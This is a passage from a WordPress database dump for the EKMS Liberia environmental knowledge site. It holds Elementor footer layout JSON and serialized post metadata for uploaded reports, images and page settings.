now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/newsletter\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.9909999999999996589394868351519107818603515625,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/contribute\\/\\\">Join here!<\\/a><\\/span>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.92699999999999960209606797434389591217041015625},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.14699999999999846522769075818359851837158203125},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":5.19500000000000028421709430404007434844970703125,\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/gef_logo.png\",\"id\":2838,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":71.1580000000000012505552149377763271331787109375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":12.67699999999999960209606797434389591217041015625},\"elements\":[],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":10.9700000000000006394884621840901672840118408203125,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":8.8390000000000004121147867408581078052520751953125},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":10.535000000000000142108547152020037174224853515625},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":34.18500000000000227373675443232059478759765625,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":46.441000000000002501110429875552654266357421875},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22%26copy%3B%20%22%2C%22after%22%3A%22%20%3Ca%20href%3D%5C%22https%3A%2F%2Fekmsliberia.info%2F%5C%22%20title%3D%5C%22Go%20Home!%5C%22%3EEKMS%3C%2Fa%3E.%20All%20Rights%20Reserved.%20%20Managed%20by%20the%20Environmental%20Protection%20Agency%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38584,3170,'_elementor_css','a:6:{s:4:\"time\";i:1770854587;s:5:\"fonts\";a:2:{i:0;s:6:\"Roboto\";i:1;s:11:\"Roboto Slab\";}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(36509,5367,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(36510,5367,'_elementor_screenshot_failed','2022-08-19 15:15:17'),(36512,3805,'_elementor_controls_usage','a:8:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:9;s:15:\"control_percent\";i:2;s:8:\"controls\";a:4:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:9;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:8:{s:10:\"text_color\";i:9;s:21:\"typography_typography\";i:9;s:22:\"typography_font_family\";i:9;s:22:\"typography_font_weight\";i:9;s:25:\"typography_text_transform\";i:4;s:22:\"typography_line_height\";i:1;s:20:\"typography_font_size\";i:5;s:5:\"align\";i:3;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:1;}}s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}}}s:6:\"button\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_button\";a:6:{s:4:\"text\";i:1;s:4:\"size\";i:1;s:13:\"selected_icon\";i:1;s:10:\"icon_align\";i:1;s:11:\"icon_indent\";i:1;s:4:\"link\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:10:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:16:\"background_color\";i:1;s:11:\"hover_color\";i:1;s:29:\"button_background_hover_color\";i:1;s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:13:\"border_radius\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:14;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:14;s:16:\"content_position\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:3;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}s:8:\"nav-menu\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:6:{s:4:\"menu\";i:1;s:6:\"layout\";i:1;s:11:\"align_items\";i:1;s:7:\"pointer\";i:1;s:12:\"submenu_icon\";i:1;s:8:\"dropdown\";i:1;}}s:5:\"style\";a:1:{s:23:\"section_style_main-menu\";a:7:{s:26:\"menu_typography_typography\";i:1;s:27:\"menu_typography_font_family\";i:1;s:27:\"menu_typography_font_weight\";i:1;s:30:\"menu_typography_text_transform\";i:1;s:15:\"color_menu_item\";i:1;s:21:\"color_menu_item_hover\";i:1;s:18:\"menu_space_between\";i:1;}}s:8:\"advanced\";a:2:{s:36:\"jet_family_widget_orientaion_section\";a:1:{s:37:\"jet_family_widget_is_order_orientaion\";i:1;}s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:1;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_icon_style\";a:1:{s:10:\"icon_color\";i:1;}s:18:\"section_text_style\";a:5:{s:10:\"text_color\";i:1;s:26:\"icon_typography_typography\";i:1;s:27:\"icon_typography_font_family\";i:1;s:25:\"icon_typography_font_size\";i:1;s:27:\"icon_typography_font_weight\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:6:\"layout\";a:3:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:3;}s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:5;}s:14:\"section_layout\";a:3:{s:16:\"content_position\";i:2;s:3:\"gap\";i:2;s:6:\"layout\";i:2;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:2:{s:6:\"margin\";i:2;s:7:\"padding\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:2;s:16:\"background_color\";i:2;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:5:\"image\";i:1;s:5:\"align\";i:1;s:7:\"link_to\";i:1;s:4:\"link\";i:1;}}}}s:12:\"social-icons\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:19:\"section_social_icon\";a:3:{s:16:\"social_icon_list\";i:1;s:5:\"shape\";i:1;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:20:\"section_social_style\";a:4:{s:10:\"icon_color\";i:1;s:18:\"icon_primary_color\";i:1;s:9:\"icon_size\";i:1;s:12:\"icon_spacing\";i:1;}}}}}'),(36514,5370,'_wp_attached_file','2023/08/National-Fire-Preparedness-Response-Plan-ToR.docx'),(36515,5370,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:87597;}'),(36516,5371,'_last_editor_used_jetpack','classic-editor'),(36517,5371,'_edit_lock','1750843124:38'),(36518,5371,'_edit_last','42'),(36519,5371,'_wp_page_template','default'),(36520,5371,'closed_date','2023-08-24'),(36521,5371,'owner','EPA'),(36522,5371,'vacancy_link','https://ekmsliberia.info/wp-content/uploads/2023/08/National-Fire-Preparedness-Response-Plan-ToR.docx'),(36523,5374,'_last_editor_used_jetpack','classic-editor'),(36524,5374,'_edit_lock','1694720012:42'),(36525,5374,'_edit_last','42'),(36526,5375,'_wp_attached_file','2023/09/Post_Final_13SEPT23.docx'),(36527,5375,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:21314;}'),(36528,5376,'_wp_attached_file','2023/09/ci_99650429_Full-Copy.jpg'),(36529,5376,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:33:\"2023/09/ci_99650429_Full-Copy.jpg\";s:8:\"filesize\";i:81846;s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"ci_99650429_Full-Copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8016;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:33:\"ci_99650429_Full-Copy-300x265.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22065;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:32:\"ci_99650429_Full-Copy-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5068;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:33:\"ci_99650429_Full-Copy-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14603;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:17:\"Benjamin Drummond\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:48:\"Cacao ripen on a farm near Kyekyewere. 403VS3191\";s:17:\"created_timestamp\";s:10:\"1396280855\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:48:\"Cacao ripen on a farm near Kyekyewere. 403VS3191\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36530,5374,'_wp_page_template','default'),(36531,5374,'download_link','https://ekmsliberia.info/wp-content/uploads/2023/09/Post_Final_13SEPT23.docx'),(36532,5374,'by','CI'),(36533,5374,'year','2023'),(36534,5374,'_pods_document_cover_image','a:1:{i:0;i:5376;}'),(36535,5374,'document_cover_image','5376'),(36536,5374,'_pods_attached_document','a:1:{i:0;i:5375;}'),(36537,5374,'attached_document','5375'),(36538,5378,'_last_editor_used_jetpack','classic-editor'),(36539,5378,'_edit_lock','1694720303:42'),(36540,5378,'_edit_last','42'),(36541,5379,'_wp_attached_file','2023/09/Copy-of-GEF-FOLUR-Project-_Summary.pdf'),(36542,5379,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:413734;}'),(36543,5380,'_wp_attached_file','2023/09/FOLUR-project-Grievance-Redress-Mechanism_05SEPT23.pdf'),(36544,5380,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:82544;}'),(36545,5381,'_wp_attached_file','2023/09/Screenshot-2023-09-14-at-19-24-30-EKMS-CloudDrive.png'),(36546,5381,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:61:\"2023/09/Screenshot-2023-09-14-at-19-24-30-EKMS-CloudDrive.png\";s:8:\"filesize\";i:137590;s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"Screenshot-2023-09-14-at-19-24-30-EKMS-CloudDrive-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36873;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:61:\"Screenshot-2023-09-14-at-19-24-30-EKMS-CloudDrive-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:129403;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:60:\"Screenshot-2023-09-14-at-19-24-30-EKMS-CloudDrive-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:24900;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:61:\"Screenshot-2023-09-14-at-19-24-30-EKMS-CloudDrive-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:86577;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36547,5378,'_wp_page_template','default'),(36548,5378,'download_link','https://ekmsliberia.info/wp-content/uploads/2023/09/Copy-of-GEF-FOLUR-Project-_Summary.pdf'),(36549,5378,'by','CI'),(36550,5378,'year','2023'),(36551,5378,'_pods_document_cover_image','a:1:{i:0;i:5381;}'),(36552,5378,'document_cover_image','5381'),(36553,5378,'_pods_attached_document','a:1:{i:0;i:5379;}'),(36554,5378,'attached_document','5379'),(36555,5383,'_last_editor_used_jetpack','classic-editor'),(36556,5383,'_edit_lock','1694721337:42'),(36557,5383,'_edit_last','42'),(36558,5383,'_wp_page_template','default'),(36559,5383,'download_link','https://ekmsliberia.info/wp-content/uploads/2023/09/FOLUR-project-Grievance-Redress-Mechanism_05SEPT23.pdf'),(36560,5383,'by','CI'),(36561,5383,'year','2023'),(36562,5383,'_pods_document_cover_image','a:1:{i:0;i:5376;}'),(36563,5383,'document_cover_image','5376'),(36564,5383,'_pods_attached_document','a:1:{i:0;i:5380;}'),(36565,5383,'attached_document','5380'),(36576,5397,'_edit_lock','1746694508:38'),(36577,5397,'_last_editor_used_jetpack','block-editor'),(36578,5398,'_wp_attached_file','2025/05/495335766_1161522499350341_7351978006935386528_n.jpg'),(36579,5398,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:975;s:4:\"file\";s:60:\"2025/05/495335766_1161522499350341_7351978006935386528_n.jpg\";s:8:\"filesize\";i:219206;s:5:\"sizes\";a:14:{s:6:\"medium\";a:5:{s:4:\"file\";s:60:\"495335766_1161522499350341_7351978006935386528_n-300x229.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16793;}s:5:\"large\";a:5:{s:4:\"file\";s:61:\"495335766_1161522499350341_7351978006935386528_n-1024x780.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:780;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:174914;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:60:\"495335766_1161522499350341_7351978006935386528_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6147;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"495335766_1161522499350341_7351978006935386528_n-768x585.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:585;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102618;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:60:\"495335766_1161522499350341_7351978006935386528_n-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23311;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:59:\"495335766_1161522499350341_7351978006935386528_n-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3806;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:60:\"495335766_1161522499350341_7351978006935386528_n-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12939;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:60:\"495335766_1161522499350341_7351978006935386528_n-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36618;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:60:\"495335766_1161522499350341_7351978006935386528_n-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42714;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:60:\"495335766_1161522499350341_7351978006935386528_n-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59500;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:61:\"495335766_1161522499350341_7351978006935386528_n-1170x650.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:157019;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:60:\"495335766_1161522499350341_7351978006935386528_n-600x457.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:457;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63089;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:60:\"495335766_1161522499350341_7351978006935386528_n-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92229;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:61:\"495335766_1161522499350341_7351978006935386528_n-1280x640.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:181940;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36582,5397,'_thumbnail_id','5398'),(36583,5397,'_edit_last','38'),(36584,5397,'kava_extra_enable_breadcrumbs','inherit'),(36585,5397,'post_formats',''),(36586,5397,'gallery_tab',''),(36587,5397,'kava_extra_gallery_images',''),(36588,5397,'link_tab',''),(36589,5397,'kava_extra_link',''),(36590,5397,'kava_extra_link_target','_blank'),(36591,5397,'quote_tab',''),(36592,5397,'kava_extra_quote_text',''),(36593,5397,'kava_extra_quote_cite',''),(36594,5397,'audio_tab',''),(36595,5397,'kava_extra_audio',''),(36596,5397,'kava_extra_audio_loop','false'),(36597,5397,'kava_extra_audio_autoplay','false'),(36598,5397,'kava_